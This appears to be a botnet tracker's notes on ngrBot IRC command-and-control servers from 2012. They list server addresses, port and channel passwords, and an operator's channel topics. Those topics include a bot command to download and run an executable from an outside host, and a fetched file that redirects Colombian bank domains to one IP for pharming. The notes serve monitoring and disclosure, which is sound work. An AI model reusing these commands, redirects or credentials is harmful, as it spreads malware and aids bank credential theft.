tut0r1allsvu.info (ngr botnet hosted by United States Elk Grove Village Foroquimica Sl)

Resolved tut0r1allsvu.info to 75.127.10.3

Server: tut0r1allsvu.info
Port: 8059
Password:ocx
Channel: ##h4n
Channel password: shell3

* Topic for ##h4n is: -up hxxp://www.premiersportsgroup.co/utily.exe 96E0E5E5861397EF644FA006BB888956 | -s
* Topic for ##h4n set by Ko0l at Tue Oct 02 05:13:49 2012

Redirecting Colombian bots for pharming

* Topic for #CO is: -mdns http://www.ellegadodelleon.com.ar/wp-content/it.txt
* Topic for #CO set by Ko0l at Tue Oct 02 05:15:56 2012

Also spanish bots

* Topic for #ESP is: -mdns http://www.ellegadodelleon.com.ar/wp-content/it.txt
* Topic for #ESP set by Ko0l at Tue Oct 02 05:16:23 2012

it.txt

www.bbva.com.co 64.31.23.157
bbva.com.co 64.31.23.157
www.avvillas.com.co 64.31.23.157
avvillas.com.co 64.31.23.157
www.bancodebogota.com 64.31.23.157
bancodebogota.com 64.31.23.157
www.bancocajasocial.com 64.31.23.157
bancocajasocial.com 64.31.23.157
linea.davivienda.com 64.31.23.157
davivienda.com 64.31.23.157
www.davivienda.com 64.31.23.157

Oper: Ko0l

Hosting infos: http://whois.domaintools.com/tut0r1allsvu.info

dd.sult4n.net(ngrBot hosted in United States Chicago Steadfast Networks)

178.86.23.225(ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)

t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)